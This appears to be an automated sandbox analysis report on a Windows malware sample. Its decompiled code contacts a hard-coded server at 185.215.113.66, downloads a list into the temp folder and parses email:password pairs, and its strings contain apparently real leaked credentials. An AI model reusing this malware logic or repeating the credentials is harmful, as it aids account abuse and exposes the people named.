                                                                                                                                                                                                                                                                  0x00902570
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902572
                                                                                                                                                                                                                                                                  0x0090258d
                                                                                                                                                                                                                                                                  0x009025a8
                                                                                                                                                                                                                                                                  0x009025ae
                                                                                                                                                                                                                                                                  0x009025b3
                                                                                                                                                                                                                                                                  0x009025bf
                                                                                                                                                                                                                                                                  0x00902587
                                                                                                                                                                                                                                                                  0x00902587
                                                                                                                                                                                                                                                                  0x009025cc
                                                                                                                                                                                                                                                                  0x009025d2
                                                                                                                                                                                                                                                                  0x009025e6
                                                                                                                                                                                                                                                                  0x009025eb
                                                                                                                                                                                                                                                                  0x009025ee
                                                                                                                                                                                                                                                                  0x009025fb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902605
                                                                                                                                                                                                                                                                  0x009025ff
                                                                                                                                                                                                                                                                  0x009025ff

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0090238B
                                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 00902392
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009023A8
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009023BE
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009023D4
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009023EA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009023FE
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009017E3
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00901807
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: InternetReadFile.WININET(00000000,?,00000063,?), ref: 00901824
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: wsprintfA.USER32 ref: 00901860
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: InternetCloseHandle.WININET(00000000), ref: 00901882
                                                                                                                                                                                                                                                                    • Part of subcall function 009017D0: InternetCloseHandle.WININET(?), ref: 009018A1
                                                                                                                                                                                                                                                                  • strcpy.MSVCRT ref: 00902411
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0090242A
                                                                                                                                                                                                                                                                  • mbstowcs.MSVCRT ref: 00902443
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0090245E
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: memset.MSVCRT ref: 009018E2
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 009018F7
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0090191A
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: CreateFileW.KERNELBASE(00902477,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00901949
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetReadFile.WININET(00000000,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,000003FF,00902477), ref: 0090196A
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: WriteFile.KERNELBASE(000000FF,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,00000000,00000000,00000000), ref: 0090198D
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: CloseHandle.KERNEL32(000000FF), ref: 00901999
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetCloseHandle.WININET(00000000), ref: 009019BD
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetCloseHandle.WININET(00000000), ref: 009019C7
                                                                                                                                                                                                                                                                  • atoi.MSVCRT ref: 0090247B
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0090249B
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009024AF
                                                                                                                                                                                                                                                                  • _wmemset.LIBCPMTD ref: 009024C3
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009024CB
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 009024EE
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009024F7
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0090250B
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0090251F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00902544
                                                                                                                                                                                                                                                                    • Part of subcall function 009018D0: InternetReadFile.WININET(00000000,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,000003FF,00902477), ref: 009019B3
                                                                                                                                                                                                                                                                  • PathFileExistsW.KERNELBASE(C:\Users\user\AppData\Local\Temp\336362908233226.jpg), ref: 00902568
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000021D0,00000000,00000000,00000000), ref: 009025A8
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009025AE
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE ref: 009025BF
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\336362908233226.jpg), ref: 009025CC
                                                                                                                                                                                                                                                                  • atoi.MSVCRT ref: 009025E6
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009025FF
                                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0090260C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$File$_wmemset$CloseHandlerand$Openwsprintf$Read$CreateExitSleepThreadatoimemset$CountDeleteEnvironmentExistsExpandPathProcessStringsTickWritembstowcssrandstrcpy
                                                                                                                                                                                                                                                                  • String ID: %s%d.txt$%s\%d%d%d.jpg$%sn.txt$%temp%$C:\Users\user\AppData\Local\Temp\336362908233226.jpg$[84.17.52.51]
                                                                                                                                                                                                                                                                  • API String ID: 3135460431-2289529609
                                                                                                                                                                                                                                                                  • Opcode ID: e926bcb4c1de66baf1e63e117f6dea7b173c5bf59ee7a2b3ccd28c8f2bb292da
                                                                                                                                                                                                                                                                  • Instruction ID: ce7fbfdad772696e07873c89226112ff4a681932a962e1b90ceabd59b3a783d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e926bcb4c1de66baf1e63e117f6dea7b173c5bf59ee7a2b3ccd28c8f2bb292da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 135183F1E81304AFE710AB609C4BFDA737DABD4B05F0484A5F709651C2EAB557848EA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                                                                                                  			E00902660() {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v528;
                                                                                                                                                                                                                                                                  				void _v796;
                                                                                                                                                                                                                                                                  				short _v1316;
                                                                                                                                                                                                                                                                  				char _v1716;
                                                                                                                                                                                                                                                                  				void* _v1720;
                                                                                                                                                                                                                                                                  				void* _t10;
                                                                                                                                                                                                                                                                  				signed char _t17;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  				_t10 = CreateMutexA(0, 0, "69767"); // executed
                                                                                                                                                                                                                                                                  				_v1720 = _t10;
                                                                                                                                                                                                                                                                  				if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v528 = 0;
                                                                                                                                                                                                                                                                  				GetModuleFileNameW(0,  &_v524, 0x104);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1316, L"%s:Zone.Identifier",  &_v524);
                                                                                                                                                                                                                                                                  				DeleteFileW( &_v1316); // executed
                                                                                                                                                                                                                                                                  				__imp__#115(0x202,  &_v1716); // executed
                                                                                                                                                                                                                                                                  				_t17 = E00901760(); // executed
                                                                                                                                                                                                                                                                  				if((_t17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x64); // executed
                                                                                                                                                                                                                                                                  				wsprintfA( &_v796, "%s", E00901000("http://185.215.113.66/pol/"));
                                                                                                                                                                                                                                                                  				CreateThread(0, 0, E00902370,  &_v796, 0, 0); // executed
                                                                                                                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                                                                                                                  					Sleep(0xcdfe600); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 0;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0090266e
                                                                                                                                                                                                                                                                  0x0090267d
                                                                                                                                                                                                                                                                  0x00902683
                                                                                                                                                                                                                                                                  0x00902694
                                                                                                                                                                                                                                                                  0x00902698
                                                                                                                                                                                                                                                                  0x00902698
                                                                                                                                                                                                                                                                  0x0090269e
                                                                                                                                                                                                                                                                  0x009026b6
                                                                                                                                                                                                                                                                  0x009026cf
                                                                                                                                                                                                                                                                  0x009026df
                                                                                                                                                                                                                                                                  0x009026f1
                                                                                                                                                                                                                                                                  0x009026f7
                                                                                                                                                                                                                                                                  0x00902701
                                                                                                                                                                                                                                                                  0x00902705
                                                                                                                                                                                                                                                                  0x00902705
                                                                                                                                                                                                                                                                  0x0090270d
                                                                                                                                                                                                                                                                  0x0090272d
                                                                                                                                                                                                                                                                  0x0090274a
                                                                                                                                                                                                                                                                  0x00902750
                                                                                                                                                                                                                                                                  0x0090275e
                                                                                                                                                                                                                                                                  0x0090275e
                                                                                                                                                                                                                                                                  0x0090276b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0090266E
                                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,69767), ref: 0090267D
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00902689
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00902698
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 009026B6
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 009026CF
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?), ref: 009026DF
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 009026F1
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00902705
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitFileProcess$CreateDeleteErrorLastModuleMutexNameSleepStartupwsprintf
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$69767$http://185.215.113.66/pol/
                                                                                                                                                                                                                                                                  • API String ID: 3138769648-1582482918
                                                                                                                                                                                                                                                                  • Opcode ID: f08b916c2b3cdc08b90d4f2e917e3092f5ea180771b282e068a3f1d84e75057b
                                                                                                                                                                                                                                                                  • Instruction ID: 1332768c0f5bffbe97a983b8062b95c28b77d53cab0665893e79dd9c0dc5ddf9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f08b916c2b3cdc08b90d4f2e917e3092f5ea180771b282e068a3f1d84e75057b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2921A4B0A59304EFE7209BA0DC0EFA9777DAB48B06F008455F709E40D1EBB557849F61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 153 9018d0-901904 memset InternetOpenW 154 9019c3-9019d5 InternetCloseHandle 153->154 155 90190a-901927 InternetOpenUrlW 153->155 156 9019b9-9019bd InternetCloseHandle 155->156 157 90192d-901934 155->157 156->154 158 9019a1-9019b3 InternetReadFile 157->158 159 901936-901956 CreateFileW 157->159 158->156 160 901958-901972 InternetReadFile 159->160 161 90199f 159->161 162 901974-901978 160->162 163 901995-901999 CloseHandle 160->163 161->156 162->163 164 90197a-901993 WriteFile 162->164 163->161 164->160
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E009018D0(signed char _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				long _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  				void* _t32;
                                                                                                                                                                                                                                                                  				int _t33;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				memset("au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea", 0, 0x400);
                                                                                                                                                                                                                                                                  				_v24 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v24 != 0) {
                                                                                                                                                                                                                                                                  					_t27 = InternetOpenUrlW(_v24, _a8, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t27;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						if((_a4 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  							InternetReadFile(_v8, "au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea", 0x3ff,  &_v20); // executed
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t32 = CreateFileW(_a12, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                  							_v12 = _t32;
                                                                                                                                                                                                                                                                  							if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									_t33 = InternetReadFile(_v8, "au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea", 0x3ff,  &_v20); // executed
                                                                                                                                                                                                                                                                  									if(_t33 == 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									WriteFile(_v12, "au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea", _v20,  &_v16, 0); // executed
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								CloseHandle(_v12);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InternetCloseHandle(_v24);
                                                                                                                                                                                                                                                                  				return 0x904120;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x009018e2
                                                                                                                                                                                                                                                                  0x009018fd
                                                                                                                                                                                                                                                                  0x00901904
                                                                                                                                                                                                                                                                  0x0090191a
                                                                                                                                                                                                                                                                  0x00901920
                                                                                                                                                                                                                                                                  0x00901927
                                                                                                                                                                                                                                                                  0x00901934
                                                                                                                                                                                                                                                                  0x009019b3
                                                                                                                                                                                                                                                                  0x00901936
                                                                                                                                                                                                                                                                  0x00901949
                                                                                                                                                                                                                                                                  0x0090194f
                                                                                                                                                                                                                                                                  0x00901956
                                                                                                                                                                                                                                                                  0x00901958
                                                                                                                                                                                                                                                                  0x0090196a
                                                                                                                                                                                                                                                                  0x00901972
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090198d
                                                                                                                                                                                                                                                                  0x0090198d
                                                                                                                                                                                                                                                                  0x00901999
                                                                                                                                                                                                                                                                  0x00901999
                                                                                                                                                                                                                                                                  0x0090199f
                                                                                                                                                                                                                                                                  0x00901934
                                                                                                                                                                                                                                                                  0x009019bd
                                                                                                                                                                                                                                                                  0x009019bd
                                                                                                                                                                                                                                                                  0x009019c7
                                                                                                                                                                                                                                                                  0x009019d5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009018E2
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 009018F7
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0090191A
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00902477,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00901949
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,000003FF,00902477), ref: 0090196A
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(000000FF,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,00000000,00000000,00000000), ref: 0090198D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00901999
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea,000003FF,00902477), ref: 009019B3
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009019BD
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009019C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea, xrefs: 009018DD, 00901961, 00901984, 009019AA, 009019CD
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 009018F2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritememset
                                                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$au:mrboot1080everygoddess71@optusnet.com.au:frank09everykind@iprimus.com.au:CAT793Cohteverynamewastaken7@yahoomail.com.au:blind22maneveryone2013@yahoo.com.au:dousdous11everyone2013@yahoo.com.au:orion89everyone@bizfone.com.au:livelife5everyone@guidetohea
                                                                                                                                                                                                                                                                  • API String ID: 4022733741-2957393017
                                                                                                                                                                                                                                                                  • Opcode ID: ad6769db2d4645c660c6a4905b5107ec9ce895ee3288184c5293959d3a135d01
                                                                                                                                                                                                                                                                  • Instruction ID: bd28aa508cfdc7d650b29364574cdbd86208d8dbb00b9297321b87800c802ecb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad6769db2d4645c660c6a4905b5107ec9ce895ee3288184c5293959d3a135d01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B315EB4A54305BFEB10DBA4ED5AFAE7B7CAB48705F208554F711BA2C0D6B0AB40DB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 165 9021d0-902207 GetTickCount srand _wfopen 166 902296-9022bb call 901400 call 9018b0 165->166 167 90220d 165->167 177 9022c1-9022d7 call 9018b0 166->177 178 90235d-90235f ExitThread 166->178 168 902217-902234 fgets 167->168 170 902236-90226d rand 168->170 171 902287-902293 fclose 168->171 173 902285 170->173 174 90226f-902282 strcpy 170->174 171->166 173->168 174->173 177->178 181 9022dd-9022f3 call 9018b0 177->181 181->178 184 9022f5-902313 call 9021b0 181->184 184->178 187 902315-902345 strtok 184->187 187->178 188 902347-902355 call 9019e0 187->188 190 90235a 188->190 190->178
                                                                                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                                                                                  			E009021D0() {
                                                                                                                                                                                                                                                                  				char _v268;
                                                                                                                                                                                                                                                                  				char _v532;
                                                                                                                                                                                                                                                                  				struct _IO_FILE* _v536;
                                                                                                                                                                                                                                                                  				long _v540;
                                                                                                                                                                                                                                                                  				intOrPtr _v544;
                                                                                                                                                                                                                                                                  				char* _v548;
                                                                                                                                                                                                                                                                  				signed char _v552;
                                                                                                                                                                                                                                                                  				int _t28;
                                                                                                                                                                                                                                                                  				char* _t40;
                                                                                                                                                                                                                                                                  				signed char _t42;
                                                                                                                                                                                                                                                                  				void* _t57;
                                                                                                                                                                                                                                                                  				void* _t59;
                                                                                                                                                                                                                                                                  				signed long long _t70;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t28 = GetTickCount();
                                                                                                                                                                                                                                                                  				srand(_t28);
                                                                                                                                                                                                                                                                  				_push("r");
                                                                                                                                                                                                                                                                  				_push("C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg"); // executed
                                                                                                                                                                                                                                                                  				L009027B6(); // executed
                                                                                                                                                                                                                                                                  				_t59 = _t57 + 0xc;
                                                                                                                                                                                                                                                                  				_v536 = _t28;
                                                                                                                                                                                                                                                                  				if(_v536 == 0) {
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					E00901400( &_v532);
                                                                                                                                                                                                                                                                  					if(E009018B0( &_v532, "@") != 0 && E009018B0( &_v532, ".") != 0 && E009018B0( &_v532, ":") != 0) {
                                                                                                                                                                                                                                                                  						_v544 = E009021B0( &_v532, 0x3a);
                                                                                                                                                                                                                                                                  						if(_v544 != 0) {
                                                                                                                                                                                                                                                                  							_v544 = _v544 + 1;
                                                                                                                                                                                                                                                                  							_v548 = strtok( &_v532, ":");
                                                                                                                                                                                                                                                                  							if(_v548 != 0) {
                                                                                                                                                                                                                                                                  								_push(_v544);
                                                                                                                                                                                                                                                                  								E009019E0(_v548); // executed
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					ExitThread(0);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v540 = 0;
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						_t40 = fgets( &_v268, 0x104, _v536); // executed
                                                                                                                                                                                                                                                                  						_t59 = _t59 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t40 == 0) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v540 = _v540 + 1;
                                                                                                                                                                                                                                                                  						_t42 = rand();
                                                                                                                                                                                                                                                                  						_v552 = _t42;
                                                                                                                                                                                                                                                                  						asm("fild dword [ebp-0x224]");
                                                                                                                                                                                                                                                                  						_t70 = _t70 /  *0x903990;
                                                                                                                                                                                                                                                                  						asm("fild dword [ebp-0x218]");
                                                                                                                                                                                                                                                                  						asm("fld1");
                                                                                                                                                                                                                                                                  						asm("fdivrp st1, st0");
                                                                                                                                                                                                                                                                  						asm("fcompp");
                                                                                                                                                                                                                                                                  						asm("fnstsw ax");
                                                                                                                                                                                                                                                                  						if((_t42 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                  							strcpy( &_v532,  &_v268);
                                                                                                                                                                                                                                                                  							_t59 = _t59 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					fclose(_v536); // executed
